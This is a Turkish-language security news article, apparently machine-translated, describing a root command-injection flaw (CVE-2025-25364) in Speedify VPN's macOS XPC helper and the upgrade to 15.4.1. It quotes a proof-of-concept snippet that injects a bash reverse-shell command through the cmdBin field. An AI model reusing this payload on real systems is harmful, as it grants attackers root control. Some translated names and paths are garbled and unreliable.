CVE-2025-25364 olarak izlenen macOS için Speedify VPN uygulamasında büyük bir güvenlik kusuru, milyonlarca kullanıcıyı tam sistem uzlaşma riskine maruz bıraktı.
Securelayer7’deki araştırmacılar, Speedify’ın ayrıcalıklı yardımcı aracındaki güvenlik açığını keşfettiler. Potansiyel olarak yerel saldırganların rasgele komutları kök olarak yürütmesine ve etkilenen sistemlerin tam kontrolünü almasına izin verebilir.
CVE-2025-25364: Kritik bir komut enjeksiyon güvenlik açığı
Sorunun kökü me.connectify.smjobblesshelper xpc hizmeti-Speedify için sistem düzeyinde ağ işlemlerini gerçekleştirmek için yüksek (kök) ayrıcalıklarla çalışan yardımcı bir araçtır.
.png
)
/Library/privilegedhelpertools/me.connectify.smjobbleshelper üzerinden ayrıcalıklı bir arka planon olarak yüklenen bu hizmet, Apple’ın XPC mesajlaşma sistemi aracılığıyla ana Speedify uygulamasından komutları almak ve işlemek için yapılandırılmıştır.
Bakış açısı | Detaylar |
CVE kimliği | CVE-2025-25364 |
Etkilenen ürün | VPN’yi hızlandır |
Etkilenen versiyon | 15.0.0 (macOS) |
Yamalı versiyon | 15.4.1 |
Bileşen | me.connectify.smjobblesshelper (/kütüphane/ayrıcalıkta ayrıcalıklı yardımcı alet/) |
Güvenlik Açığı Türü | Komut enjeksiyonu |
Gelen XPC mesajlarındaki özellikle CMDPATH ve CMDBIN alanlarının yanlış giriş doğrulaması nedeniyle, yerel bir saldırgan kötü niyetli bir yük oluşturabilir.
Bu alanlar, bir saldırganın rastgele kabuk komutları enjekte etmesini sağlayan, daha sonra yardımcı aracın kök ayrıcalıklarıyla yürüttüğü rastgele kabuk komutlarına enjekte etmesini sağlayan doğrudan komut yürütme mantığına gömülür.
Üç temel işlev bu güvenlik açığının merkezindedir:
- XPC Mesaj İşleyicisi: Gelen XPC mesajlarını kabul eder ve ayrıştırır, “RunSpeedify” isteği olanları giriş doğrulaması olmadan bir lansman işleyicisine yönlendirir.
- _Handlelaunchspeedifymsg: CMDPATH ve CMDBIN’i doğrudan girişten çıkarır ve program yürütmesini başlatır.
- _Runsystemcmd: Bu alanlardan bir kabuk komutu oluşturur ve System () ‘i yürütmek için çağırır. Bu çizgi enjeksiyon riskini göstermektedir:
rax = asprintf (& var_38, “codeSign -v -r = \” Sertifika Yaprağı[subject.CN] = \ ”%S \” ve çınlama elma jenerik \ ”\”%s \ ””, “…”, rcx);
Bir tehdit oyuncusu cmdbin veya cmdpath, harici bir sunucuya kök kabuk bağlantısı açmak için “;
Araştırmacılar, savunmasız yardımcısına bağlanmak ve hazırlanmış bir yük göndermek için XPC API’lerini kullanarak Objective-C’de yazılmış bir kavram kanıtı (POC) istismarı yayınladılar.
Yük, ters bir kabuk yumurtlama gibi kök olarak keyfi kod yürütmeyi tetikler. İşte ilgili bir snippet:
xpc_dictionary_set_string(message, "cmdPath", "/tmp");
const char *injectionPayload = "\"; bash -i >& /dev/tcp/127.0.0.1/1339 0>&1; echo \"";
xpc_dictionary_set_string(message, "cmdBin", injectionPayload);
Bu kusurun etkisi kritiktir: Yerel erişime sahip bir saldırgan tam kök kontrolü kazanabilir, hassas dosyaları değiştirebilir, kalıcı kötü amaçlı yazılım yükleyebilir ve verileri pess edebilir.
Çoğu Speedify VPN kullanıcıları gizlilik için uygulamaya güvendiğinden, bu güvenlik açığı geniş bir kullanıcı tabanının güvenliğini zayıflatabilir.
Speedify kullanıcılarına, tam bir yardımcı alet yeniden yazımı, daha katı giriş doğrulaması ve güvensiz XPC kullanımının kaldırılması ile kusuru ele alan 15.4.1 veya daha yüksek sürümlere yükseltmeleri şiddetle tavsiye edilir.
Olay, tüm ayrıcalıklı kodlarda titiz girdi validasyonunun en önemli önemini vurgulamaktadır.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!